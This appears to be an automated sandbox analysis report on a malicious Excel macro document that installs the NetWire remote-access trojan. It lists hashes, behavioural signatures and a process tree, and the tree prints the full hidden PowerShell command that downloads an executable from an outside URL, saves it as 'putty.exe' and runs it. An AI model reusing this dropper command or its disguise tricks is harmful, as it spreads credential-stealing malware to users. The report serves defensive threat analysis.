Overview

overview

10

Static

static

PO29062020.xlsm

windows7_x64

10

PO29062020.xlsm

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    83s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    29-06-2020 19:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO29062020.xlsm

  • Size

    407KB

  • MD5

    2958c347433029ff3d06f2e3f32a735b

  • SHA1

    b729fbe5d5642ca5987db47352b134797852d097

  • SHA256

    d70d7499eec43adaa9d908f4df45fbb064a53e488f765ec5a5cb99baf1285389

  • SHA512

    0ff681ca3254a6ae552b91a9017aa660725e148c35adaebc830f7f37778d8a1f05fe64681fbc9732a7e6c6992c325f2c7c14eac20f813e78a15de8f28bba28d6

Score
10/10
ratbotnetstealernetwire

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://longi.ca/wdfr.exe

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops startup file 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    botnetstealernetwire
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 27 IoCs
  • NetWire RAT payload 2 IoCs
    rat
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO29062020.xlsm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: AddClipboardFormatListener
    PID:1356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://longi.ca/wdfr.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
      2⤵
      • Blacklisted process makes network request
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1612
      • C:\Users\Admin\AppData\Local\Temp\putty.exe
        "C:\Users\Admin\AppData\Local\Temp\putty.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Loads dropped DLL
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Users\Admin\AppData\Local\Temp\whdhost.exe
          "C:\Users\Admin\AppData\Local\Temp\whdhost.exe"
          4⤵
          • Executes dropped EXE
          PID:1852
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy "C:/Users/Admin/AppData/Local/Temp/putty.exe" "%temp%\FolderN\name.exe" /Y
          4⤵
            PID:1176
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c echo [zoneTransfer]ZoneID = 2 > %temp%\FolderN\name.exe:Zone.Identifier
            4⤵
            • NTFS ADS
            PID:1636

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\putty.exe
      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\putty.exe
      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\whdhost.exe
      Download Submit
    • \Users\Admin\AppData\Local\Temp\whdhost.exe
      Download Submit
    • memory/1176-13-0x0000000000000000-mapping.dmp
      Download
    • memory/1356-2-0x0000000005E80000-0x0000000005F80000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/1356-3-0x0000000005E80000-0x0000000005F80000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/1356-1-0x0000000005E80000-0x0000000005F80000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/1612-4-0x0000000000000000-mapping.dmp
      Download
    • memory/1636-14-0x0000000000000000-mapping.dmp
      Download
    • memory/1812-5-0x0000000000000000-mapping.dmp
      Download
    • memory/1852-10-0x000000000040242D-mapping.dmp
      Download
    • memory/1852-9-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

      Download
    • memory/1852-12-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

      Download